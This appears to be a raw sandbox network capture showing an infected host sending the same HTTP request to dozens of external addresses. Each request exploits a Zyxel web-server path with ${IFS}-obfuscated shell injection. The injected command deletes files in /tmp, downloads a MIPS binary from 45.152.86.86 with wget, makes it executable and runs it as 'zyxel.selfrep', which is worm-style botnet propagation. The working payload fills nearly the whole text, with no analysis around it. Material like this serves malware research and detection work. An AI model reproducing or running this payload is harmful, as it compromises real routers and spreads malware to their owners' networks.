                              Mar 31, 2024 08:41:41.014172077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5950192.168.2.134948694.226.112.106443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014213085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5951192.168.2.13383321.161.172.42443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014251947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5952192.168.2.135721860.83.161.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014291048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5953192.168.2.135359668.52.141.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014333010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5954192.168.2.1340050138.170.253.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014379978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5955192.168.2.133465624.62.219.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014415979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5956192.168.2.133688619.128.167.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014452934 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5957192.168.2.1352954205.210.182.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014475107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5958192.168.2.135553213.72.71.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014516115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5959192.168.2.1339844150.51.8.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014563084 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5960192.168.2.135934053.47.227.186443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014611959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5961192.168.2.1350040171.122.80.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014653921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5962192.168.2.1351286147.66.175.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014688969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5963192.168.2.1349712209.205.0.96443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014744043 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5964192.168.2.1334364138.11.203.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014786959 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5965192.168.2.1338648210.82.37.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014832973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5966192.168.2.1336924139.94.41.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014864922 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5967192.168.2.1351436117.253.26.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014909983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5968192.168.2.136028457.61.87.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014951944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5969192.168.2.133433039.254.167.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.014976025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5970192.168.2.1346616116.135.129.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015016079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5971192.168.2.1341830165.116.163.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015044928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5972192.168.2.1338302103.149.227.1443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015110016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5973192.168.2.1357892116.207.26.74443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015126944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5974192.168.2.134624683.187.117.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015192986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5975192.168.2.135348299.51.13.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015216112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5976192.168.2.1334672123.237.147.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015247107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5977192.168.2.1338612154.190.162.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015300989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5978192.168.2.1353240133.54.122.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015348911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5979192.168.2.1349388193.24.192.59443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015373945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5980192.168.2.133676423.130.77.44443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015408039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5981192.168.2.1352434183.61.26.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015450001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5982192.168.2.134542842.32.65.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015496969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5983192.168.2.134616014.95.85.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015536070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5984192.168.2.135664069.136.74.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015568972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5985192.168.2.1356288199.157.13.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015640020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5986192.168.2.133858032.204.43.109443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015664101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5987192.168.2.135663680.151.134.95443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015683889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5988192.168.2.1342130141.129.95.118443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015742064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5989192.168.2.13536362.155.174.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015798092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5990192.168.2.13407341.79.67.242443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015846968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5991192.168.2.135069825.84.192.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015871048 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5992192.168.2.1358718209.185.53.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015902996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5993192.168.2.1353638116.81.235.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.015959978 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5994192.168.2.133618470.137.133.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016002893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5995192.168.2.133382262.8.193.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016041040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5996192.168.2.135453694.111.29.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016077995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5997192.168.2.1353284156.235.94.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016118050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5998192.168.2.1358660112.55.166.124443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016180992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5999192.168.2.13354388.49.36.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016204119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6000192.168.2.1359992153.25.211.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016252041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6001192.168.2.133706814.187.147.167443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016280890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6002192.168.2.1350780179.155.79.60443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016320944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6003192.168.2.1346966106.96.65.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016360044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6004192.168.2.133935414.9.189.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016406059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6005192.168.2.134245644.137.10.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016432047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6006192.168.2.134750449.7.149.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016490936 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6007192.168.2.134947480.189.55.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016519070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6008192.168.2.1349488135.70.251.104443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016566992 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6009192.168.2.1358438139.154.171.49443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016602039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6010192.168.2.134358085.181.66.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016649008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6011192.168.2.1354688119.177.24.236443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016705990 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6012192.168.2.1348816210.52.13.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016767979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6013192.168.2.134764670.119.4.70443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016798973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6014192.168.2.1334256132.158.165.10443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016814947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6015192.168.2.134776438.89.34.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016875982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6016192.168.2.1336880210.76.147.153443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016907930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6017192.168.2.1344342172.80.249.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.016941071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6018192.168.2.1356368221.218.145.232443
                              TimestampBytes transferredDirectionData
